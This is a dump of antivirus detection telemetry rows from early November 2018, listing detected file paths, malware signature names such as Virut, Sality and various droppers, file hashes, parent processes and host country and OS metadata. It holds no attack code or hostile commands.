  Row(detection=Row(filename='avscan-20181101-152257-9445a1f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152257-9445A1F9', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:23:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T04:27:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T12:13:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\utuz21oek5t\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:52:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ebf9d5b15ba1f5e9c2468fed226b595a1ee357aff17ae3d6a47d9f5587f38c36', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\EBF9D5B15BA1F5E9C2468FED226B595A1EE357AFF17AE3D6A47D9F5587F38C36', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ebf9d5b15ba1f5e9c2468fed226b595a1ee357aff17ae3d6a47d9f5587f38c36', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:48:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3395.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3395.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msinfo32.exe', filepath='\\\\?\\C:\\Windows\\system32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='e2a74da78f36c3d50e4daf704af997b27bdfda2047389a386fc6aeb6fef54355', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='grmhlymo.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\GRMhlYMo.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150615-d4522dd4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150615-D4522DD4', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:06:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\o5ekxefvz1l\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:29:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-013123-27d4591d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2816e781\\AVSCAN-20181102-001608-8FA5C177\\AVSCAN-20181102-013123-27D4591D', filesize=292000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b6a8b40c0898fcefcf903a98f94583aa09bc3759b4237d5f0047313a8bc3235f', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:31:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-090111-60396047', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_81949114\\AVSCAN-20181101-085743-41FE8D83\\AVSCAN-20181101-090111-60396047', filesize=320000, name='HEUR/APC.#M1.#R1'), hash='e1e7c88cdfd27778cf4e4b7f08f96cc93f2931aa3a672ebd784a5065bf6a3548', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eceedc05d1d369219b966e069e55a7723a555c50cdce16dbf81983e3303bf650', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\ECEEDC05D1D369219B966E069E55A7723A555C50CDCE16DBF81983E3303BF650', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='eceedc05d1d369219b966e069e55a7723a555c50cdce16dbf81983e3303bf650', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:14:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='تشغيل.exe', filepath='j:\\محمد\\الأنشطة\\الافراح\\برامج\\gta san andrea  saudi\\new folder\\need 4 speed underground\\تشغيل.exe', filesize=3584000, name='W32/Virut.Gen.#M1.#R1'), hash='a4ca4bc82cfb9bc9245677846bb135982008863554863c8189dde63dd080f867', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:43:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0053162.exe', filepath='e:\\system volume information\\_restore{68daf5b2-45b2-4aaf-8503-fb4b3a8be63c}\\rp8\\A0053162.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='bde3ed564afd1359fd9226e16aa9a25069a2c75ec01743303baacb05144b247f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:29:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='abbf959ac30d23cf2882ec223966b0b8c30ae85415ccfc41a5924b29cd6bd4db', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\CocCoc\\Browser\\Application\\browser.exe', parentsize=923512, timestamp='2018-11-01T12:54:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tar.exe', filepath='C:\\Users\\X\\Desktop\\JUDGES\\Exes\\tar.exe', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='99d5d3daee62592a20d1e32dd290b9e19e3f7fc1756cb7c484382f033b2aad82', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:47:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aba77a91f42d6333b4f699c3952dfd435b134cd8dfa9eb004380c6f3247c47bc', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\ABA77A91F42D6333B4F699C3952DFD435B134CD8DFA9EB004380C6F3247C47BC', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='aba77a91f42d6333b4f699c3952dfd435b134cd8dfa9eb004380c6f3247c47bc', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:28:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='daa98c2308660af2588081434377fe230460a83598e19beefaa0146486cb7dde.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\DAA98C2308660AF2588081434377FE230460A83598E19BEEFAA0146486CB7DDE.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='daa98c2308660af2588081434377fe230460a83598e19beefaa0146486cb7dde', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:13:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csc.exe', filepath='C:\\Windows.old.000\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe', filesize=1924000, name='W32/Sality.AT.#M1.#R1'), hash='d9a43da9d7a28d29ee78b8e8c8f0f9f714b3a80edb10bf5598daca82bab4929f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T02:40:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='aa13c3c41c4a718e4b0c4da457094f6a51caf4689210aafa551e98bfe2f13b14', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T07:12:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='multisynclogsender.exe', filepath='\\\\?\\C:\\MultiSync\\MultiSyncLogSender.exe', filesize=3520000, name='HEUR/APC.#M1.#R1'), hash='0cb88fe6d4e90aa35280549f2845b7e9bcfcc9342dc0b548f86316359b2ae222', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:50:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files (x86)\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='7a0dcdb58d4e5bbf303af3c6c5f9063ecfeb2e404d5797577234cd26d8be0b56', metadata=Row(cmdline='\\\\\\/increment', country='NI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\System32\\aitagent.exe', parentsize=None, timestamp='2018-11-04T21:07:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:44:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-04T11:37:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131658-0afd353c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7ce409ba\\AVSCAN-20181104-130709-B225149F\\AVSCAN-20181104-131658-0AFD353C', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:17:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-171226-5b3547c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-171226-5B3547C8', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:12:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-04T16:02:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T06:30:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001ecfa', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001ecfa', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:20:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='minecraftinstall.exe', filepath='O:\\Users\\X\\Downloads\\MinecraftInstall.exe', filesize=836000, name='ADWARE/Adware.Gen.#M300.#R5606'), hash='988516f4aeee13393d1d4200532b70d99522b25f6fbd1e4605940b0e8373b8df', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T10:35:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001f48e', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001f48e', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:22:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='يا بن آدم.exe', filepath='D:\\اسلاميااااااات\\Islamic Flash\\يا بن آدم.exe', filesize=1996000, name='W32/Sality.AT.#M1.#R1'), hash='3a4029f0b8ce18583692cbf6e3b657929f29060c26b1239a90cbbb93a4a5e78e', metadata=Row(cmdline='\\\\\\/tsr', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Microsoft Office\\Office12\\ONENOTEM.EXE', parentsize=98632, timestamp='2018-11-04T12:16:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='uninst.exe', filepath='H:\\Meus Documentos\\SIAG\\remover\\uninst.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='6a3ea627f2e0d60ba455d2e35d19a611be9b749aed731ad19ddd85f50a6e04a2', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Sunbelt Software\\VIPRE\\SBAMSvc.exe', parentsize=2763080, timestamp='2018-11-04T05:31:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:32:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194726-0bb2d377', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a7cde860\\AVSCAN-20181104-193932-D922E0BC\\AVSCAN-20181104-194726-0BB2D377', filesize=2304000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='8243b53fa36e852e00ea7818825738ccbb956669ff4de7e9d3453178870096d9', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:49:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:01:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-161126-ae3f528a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-161126-AE3F528A', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:11:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T15:30:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130916-0e51d28a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130916-0E51D28A', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:09:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:25:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4741448\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:58:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='temp4.exe', filepath='\\\\?\\I:\\Ghost\\Fannan NewLook 6 Fin\\Software\\Fannan-Software\\Software\\docs\\Others\\Temp4.exe', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='0418e57652d7b6c7b8910614a0e47a365f1b0b86ba7b863831126d7e52b54ce8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:44:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140219-ed2aabd0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140219-ED2AABD0', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:48:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:55:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winbox.exe', filepath='\\\\?\\K:\\منصور جديد\\البرنامج كامل بالتحديث\\ملف التسطيب للبرنامج الجديد\\winbox.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='9db7872e4c795631636322f0749b1474bb244ee73cb40c5b652c377c83991848', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:45:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-104411-3e876b9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99abb338\\AVSCAN-20181104-104340-3AC81E1B\\AVSCAN-20181104-104411-3E876B9F', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T09:44:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-062205-ec335d12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_406863cc\\AVSCAN-20181104-062019-E3A6562C\\AVSCAN-20181104-062205-EC335D12', filesize=588000, name='PUA/Outbrowse.Gen.#M300.#R5962'), hash='0d9206094bb544f8dccce4769f52c167f2fc4aac3b1e6eecfb47053bc5da7b9d', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T14:21:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\hkiugqukypd\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:42:12Z'), dt=datetime.date(2018, 11, 4)),
